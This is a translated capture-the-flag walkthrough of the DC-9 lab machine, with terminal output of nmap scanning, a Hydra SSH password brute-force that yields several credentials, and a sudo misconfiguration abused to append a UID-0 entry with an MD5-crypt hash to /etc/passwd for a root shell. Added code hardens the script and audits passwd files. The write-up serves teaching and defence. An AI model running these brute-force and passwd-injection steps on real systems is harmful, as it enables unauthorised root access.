└─# nc 192.168.100.22 8475
(UNKNOWN) [192.168.100.22] 8475 (?) : Connection refused
                                                                                                        
┌──(root㉿kali)-[~]
└─# nc 192.168.100.22 9842
(UNKNOWN) [192.168.100.22] 9842 (?) : Connection refused
                                                                                                        
┌──(root㉿kali)-[~]
└─# nmap -p 22 192.168.100.22       
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-31 21:08 EST
Nmap scan report for 192.168.100.22
Host is up (0.00014s latency).

PORT   STATE SERVICE
22/tcp open  ssh
MAC Address: 00:0C:29:21:69:DF (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds

Port 22 is now open.

┌──(root㉿kali)-[~]
└─# nmap -sS -sV -A -n 192.168.100.22
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-31 21:23 EST
Nmap scan report for 192.168.100.22
Host is up (0.00078s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 a2:b3:38:74:32:74:0b:c5:16:dc:13:de:cb:9b:8a:c3 (RSA)
|   256 06:5c:93:87:15:54:68:6b:88:91:55:cf:f8:9a:ce:40 (ECDSA)
|_  256 e4:2c:88:da:88:63:26:8c:93:d5:f7:63:2b:a3:eb:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 00:0C:29:21:69:DF (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.78 ms 192.168.100.22

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.11 seconds

Write the usernames and passwords from UserDetails to text files.

Use Hydra to brute-force the logins.

| Parameter | Meaning |
|---|---|
| -l | attack one specified user |
| -L | username wordlist |
| -p | lowercase: a single password; rarely used, a password wordlist is the norm |
| -P | uppercase: password wordlist |
| -R | resume from the previous run's progress |
| -S | uppercase: use an SSL connection |
| -s | lowercase: specify a non-default port |
| -e | optional; n: try an empty password, s: try the login name as the password |
| -t | number of parallel tasks, default 16 |
| -C | colon-separated "login:password" file in place of -L/-P |
| -M | target list file, one target per line |
| -o | output file for results |
| -f | with -M, stop after the first login/password pair is found |
| -w | maximum wait time in seconds, default 30 |
| -v / -V | verbose output |
| server | target IP |
| service | service name (one of the supported services and protocols) |

┌──(root㉿kali)-[~/Desktop]
└─# hydra -L users.txt -P pass.txt 192.168.100.22 ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-31 21:38:13
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 289 login tries (l:17/p:17), ~19 tries per task
[DATA] attacking ssh://192.168.100.22:22/
[22][ssh] host: 192.168.100.22   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.100.22   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.100.22   login: janitor   password: Ilovepeepee
[STATUS] 285.00 tries/min, 285 tries in 00:01h, 7 to do in 00:01h, 13 active
1 of 1 target successfully completed, 3 valid passwords found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-01-31 21:39:19

Three username/password pairs obtained.

Log in over SSH as each of them and look around.

Disconnect with: logout

chandlerb
image
joeyt
image
janitor
janitor's home contains a suspicious hidden directory:
image
Open it:

janitor@dc-9:~$ cd .secrets-for-putin
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

Append these passwords to pass.txt and run Hydra again:
image
This finds one more account:
image

Log in as that user. Running `sudo -l` as each of the users shows that fredf's result differs from the others:

fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test

Change into that directory:

fredf@dc-9:/opt/devstuff/dist/test$ ls -al
total 12796
drwxr-xr-x 2 root root    4096 Dec 29  2019 .
drwxr-xr-x 3 root root    4096 Dec 29  2019 ..
-rw-r--r-- 1 root root  779676 Dec 29  2019 base_library.zip
-rwxr-xr-x 1 root root   26136 Apr  3  2019 _bz2.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  153904 Apr  3  2019 _codecs_cn.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  158032 Apr  3  2019 _codecs_hk.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   31024 Apr  3  2019 _codecs_iso2022.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  272688 Apr  3  2019 _codecs_jp.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  141616 Apr  3  2019 _codecs_kr.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  112944 Apr  3  2019 _codecs_tw.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   34008 Apr  3  2019 _hashlib.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   74688 Jul 11  2019 libbz2.so.1.0
-rwxr-xr-x 1 root root 3031904 Oct 13  2019 libcrypto.so.1.1
-rwxr-xr-x 1 root root  243840 Sep 20  2019 libexpat.so.1
-rwxr-xr-x 1 root root  158400 Jan 28  2019 liblzma.so.5
-rwxr-xr-x 1 root root 5080176 Apr  3  2019 libpython3.7m.so.1.0
-rwxr-xr-x 1 root root  309096 May  6  2018 libreadline.so.7
-rwxr-xr-x 1 root root  593696 Oct 13  2019 libssl.so.1.1
-rwxr-xr-x 1 root root  183528 Aug  6  2019 libtinfo.so.6
-rwxr-xr-x 1 root root  121280 Sep 26  2017 libz.so.1
-rwxr-xr-x 1 root root   37688 Apr  3  2019 _lzma.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   64792 Apr  3  2019 _multibytecodec.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   14632 Apr  3  2019 _opcode.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   39944 Apr  3  2019 readline.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   19752 Apr  3  2019 resource.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  116568 Apr  3  2019 _ssl.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   29064 Apr  3  2019 termios.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 1212968 Dec 29  2019 test

Now prepare the privilege escalation. Going back up the directory tree reveals the Python source the binary was built from:

fredf@dc-9:/opt/devstuff/dist/test$ cd ..
fredf@dc-9:/opt/devstuff/dist$ ls
test
fredf@dc-9:/opt/devstuff/dist$ ls -al
total 12
drwxr-xr-x 3 root root 4096 Dec 29  2019 .
drwxr-xr-x 5 root root 4096 Dec 29  2019 ..
drwxr-xr-x 2 root root 4096 Dec 29  2019 test
fredf@dc-9:/opt/devstuff/dist$ cd ..
fredf@dc-9:/opt/devstuff$ ls
build  dist  __pycache__  test.py  test.spec
fredf@dc-9:/opt/devstuff$ 

Reading the source: the script opens the file named by its first argument, reads it, and appends the contents to the file named by its second argument. The `test` binary under dist/ is this script, and the sudo rule lets fredf run it as root without a password, so fredf can append arbitrary data to any file root can write. The natural target is /etc/passwd: append an entry with UID 0 and GID 0 that carries its own password hash in the second field (anything other than `x` there is used directly instead of /etc/shadow), and `su` to that user yields a root shell.

fredf@dc-9:/opt/devstuff$ cat test.py
#!/usr/bin/python

import sys

if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)

else :
    f = open(sys.argv[1], "r")
    output = (f.read())

    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()
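
For contrast, here is an added example (my code, not the page's or the VM's) of the same utility written so that a NOPASSWD sudo rule on it would not hand out root: the destination must resolve to a path strictly inside one fixed directory (`ALLOWED_DIR` is a hypothetical value), symlinks are refused, and the file is opened with `O_NOFOLLOW`. `demo()` exercises it in a temporary directory with a constructed payload line, including the `..` and symlink escapes.

```python
#!/usr/bin/python3
# Added example (not the page's or the VM's code): the same read-and-append
# utility, hardened so that a NOPASSWD sudo rule on it is no longer a
# write-anything-as-root primitive. ALLOWED_DIR and MAX_BYTES are assumptions.
import os
import sys

ALLOWED_DIR = "/var/log/devstuff"   # hypothetical: the only tree this tool may append to
MAX_BYTES = 1 << 20                 # refuse sources larger than 1 MiB

# Constructed sample payload, the kind of line the walkthrough appends.
SAMPLE_LINE = b"admin:x:0:0::/root:/bin/bash\n"


def resolve_destination(dst, allowed_dir=ALLOWED_DIR):
    """Canonical path for dst, or ValueError if it is not strictly inside allowed_dir.

    realpath() on both sides defeats '..' and symlinked parent directories;
    commonpath() compares whole components, so '/var/log/devstuff2/x' is not
    mistaken for something under '/var/log/devstuff' the way a str.startswith
    check would.
    """
    root = os.path.realpath(allowed_dir)
    target = os.path.realpath(dst)
    if target == root or os.path.commonpath([root, target]) != root:
        raise ValueError(f"{dst!r} is outside {allowed_dir!r}")
    if os.path.islink(dst):
        raise ValueError(f"{dst!r} is a symlink")
    return target


def safe_append(src, dst, allowed_dir=ALLOWED_DIR):
    """Append the bytes of src to dst under the allow-list rule; returns bytes written.

    O_NOFOLLOW closes the window in which dst is swapped for a symlink between
    the check in resolve_destination() and the open (a TOCTOU race);
    O_APPEND keeps every write at the current end of file.
    """
    target = resolve_destination(dst, allowed_dir)
    with open(src, "rb") as f:
        data = f.read(MAX_BYTES + 1)
    if len(data) > MAX_BYTES:
        raise ValueError("source too large")
    flags = os.O_WRONLY | os.O_APPEND | os.O_CREAT | os.O_NOFOLLOW
    fd = os.open(target, flags, 0o640)
    try:
        return os.write(fd, data)
    finally:
        os.close(fd)


def demo():
    """Exercise the rules in a throwaway directory; returns what each attempt did."""
    import tempfile
    with tempfile.TemporaryDirectory() as d:
        allowed = os.path.join(d, "allowed")
        os.mkdir(allowed)
        src = os.path.join(d, "payload")
        with open(src, "wb") as f:
            f.write(SAMPLE_LINE)
        inside = os.path.join(allowed, "app.log")
        written = safe_append(src, inside, allowed) + safe_append(src, inside, allowed)
        with open(inside, "rb") as f:
            lines = f.read().count(b"\n")
        outside = os.path.join(d, "passwd")      # stands in for /etc/passwd
        results = {"written": written, "lines": lines}
        for name, path in (("direct", outside),
                           ("dotdot", os.path.join(allowed, "..", "passwd")),
                           ("symlink", os.path.join(allowed, "link"))):
            if name == "symlink":
                os.symlink(outside, path)         # link inside the tree, pointing out of it
            try:
                safe_append(src, path, allowed)
                results[name] = "escaped"
            except ValueError:
                results[name] = "refused"
    return results


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: test.py read append", file=sys.stderr)
        sys.exit(1)
    try:
        safe_append(sys.argv[1], sys.argv[2])
    except (OSError, ValueError) as e:
        print(f"refused: {e}", file=sys.stderr)
        sys.exit(2)
```

With this version, `sudo ./test /tmp/test1 /etc/passwd` exits with `refused`, which is exactly the property the original lacks. The complete fix is still to drop the sudo rule: a root-run "append any file to any file" tool has no legitimate reason to exist.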

Back on Kali, generate an MD5-crypt password hash with openssl. The command `openssl passwd -1 -salt admin admin` hashes the password `admin` with the salt `admin`.
Then, back on the target, change to /opt/devstuff/dist/test and write the new passwd entry to a file under /tmp with echo (the single quotes matter: without them the shell expands the `$` fields in the hash):
echo 'admin:$1$admin$1kgWpnZpUx.vTroWPXPIB0:0:0::/root:/bin/bash' >> /tmp/test1
Then run the sudo-permitted binary to append that file to /etc/passwd:
sudo ./test /tmp/test1 /etc/passwd
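
The hash step and the check a defender would run afterwards, as an added example that is not part of the original post: a pure-Python `md5crypt()` implementing the `$1$` scheme that `openssl passwd -1` uses (compare its output with the openssl command above), a builder for the seven-field passwd entry, and `audit_passwd()`, which flags what this attack leaves behind in /etc/passwd: a UID-0 account that is not root, and a password field that is not the shadow marker `x`. The sample passwd text is constructed.

```python
#!/usr/bin/python3
# Added example (not from the page or the DC-9 VM): generate the $1$ MD5-crypt
# hash that `openssl passwd -1 -salt <salt> <pw>` produces, build the
# /etc/passwd entry used in the walkthrough, and audit a passwd file for the
# result. Only the standard library is used.
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value, count):
    """crypt(3)-style base64: `count` chars, least significant 6 bits first."""
    out = ""
    for _ in range(count):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out


def md5crypt(password, salt):
    """MD5-crypt ($1$) following the original FreeBSD implementation.

    1000 MD5 rounds were slow in 1994 and are cheap today; it is shown here
    only because the VM's openssl produces this format.
    """
    pw = password.encode()
    salt_b = salt[:8].encode()          # crypt uses at most 8 salt characters
    ctx = hashlib.md5(pw + b"$1$" + salt_b)
    alt = hashlib.md5(pw + salt_b + pw).digest()
    remaining = len(pw)
    while remaining > 0:                # mix in alt, 16 bytes at a time
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    bit = len(pw)
    while bit:                          # one byte per bit of len(pw)
        ctx.update(b"\0" if bit & 1 else pw[:1])
        bit >>= 1
    final = ctx.digest()
    for i in range(1000):               # the stretching loop
        c = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            c.update(salt_b)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    enc = ""
    for a, b, c_ in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        enc += _to64((final[a] << 16) | (final[b] << 8) | final[c_], 4)
    enc += _to64(final[11], 2)
    return "$1$" + salt_b.decode() + "$" + enc


def verify(password, pw_hash):
    """True when pw_hash is a $1$ hash of password."""
    parts = pw_hash.split("$", 3)
    if len(parts) != 4 or parts[1] != "1":
        return False
    return md5crypt(password, parts[2]) == pw_hash


def passwd_line(user, pw_hash, uid=0, gid=0, gecos="", home="/root", shell="/bin/bash"):
    """The 7-field /etc/passwd entry; a hash in field 2 bypasses /etc/shadow."""
    return f"{user}:{pw_hash}:{uid}:{gid}:{gecos}:{home}:{shell}"


def audit_passwd(text):
    """Defender's check: UID-0 accounts other than root, password fields that
    are not a shadow marker (inline hash or empty), and malformed lines."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, fields[0], "malformed entry"))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and user != "root":
            findings.append((lineno, user, "uid 0 account that is not root"))
        if pw not in ("x", "*"):
            findings.append((lineno, user, "password field is not a shadow marker"))
    return findings


# Constructed sample of a passwd file before the attack (not the VM's real file).
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "fredf:x:1001:1001:,,,:/home/fredf:/bin/bash\n"
)


def demo():
    """Reproduce the walkthrough's step offline and return what to check."""
    h = md5crypt("admin", "admin")      # compare with `openssl passwd -1 -salt admin admin`
    entry = passwd_line("admin", h)
    return {
        "hash": h,
        "entry": entry,
        "verifies": verify("admin", h) and not verify("admin2", h),
        "before": audit_passwd(SAMPLE_PASSWD),
        "after": audit_passwd(SAMPLE_PASSWD + entry + "\n"),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, "=", v)
```

`audit_passwd()` is the same two-line test an incident responder runs by hand (`awk -F: '$3==0' /etc/passwd` and `awk -F: '$2!="x"' /etc/passwd`); on a host where the second field of any entry is a hash rather than `x`, that entry was written around the normal account tools.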

I tried this several times and, for reasons I don't understand, it finally worked with admin2. Anyone who knows why is welcome to discuss.

┌──(root㉿kali)-[~]
└─# ssh fredf@192.168.100.22             
fredf@192.168.100.22's password: 
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Feb  1 13:28:27 2024 from 192.168.100.251
fredf@dc-9:~$ cd /opt/devstuff/dist/test
fredf@dc-9:/opt/devstuff/dist/test$ ls 
base_library.zip                                 libpython3.7m.so.1.0
_bz2.cpython-37m-x86_64-linux-gnu.so             libreadline.so.7
_codecs_cn.cpython-37m-x86_64-linux-gnu.so       libssl.so.1.1
_codecs_hk.cpython-37m-x86_64-linux-gnu.so       libtinfo.so.6
_codecs_iso2022.cpython-37m-x86_64-linux-gnu.so  libz.so.1
_codecs_jp.cpython-37m-x86_64-linux-gnu.so       _lzma.cpython-37m-x86_64-linux-gnu.so
_codecs_kr.cpython-37m-x86_64-linux-gnu.so       _multibytecodec.cpython-37m-x86_64-linux-gnu.so
_codecs_tw.cpython-37m-x86_64-linux-gnu.so       _opcode.cpython-37m-x86_64-linux-gnu.so
_hashlib.cpython-37m-x86_64-linux-gnu.so         readline.cpython-37m-x86_64-linux-gnu.so
libbz2.so.1.0                                    resource.cpython-37m-x86_64-linux-gnu.so
libcrypto.so.1.1                                 _ssl.cpython-37m-x86_64-linux-gnu.so
libexpat.so.1                                    termios.cpython-37m-x86_64-linux-gnu.so
liblzma.so.5                                     test
fredf@dc-9:/opt/devstuff/dist/test$ echo 'admin2:$1$admin2$Pr1254RlLuWxoieYEI.Sa0:0:0::/root:/bin/bash' >> /tmp/test1
fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/test1 /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$ su admin2
Password: 
root@dc-9:/opt/devstuff/dist/test# 

image

Success! The flag is in /root.
image

From: https://www.cnblogs.com/p1ggy/p/18000884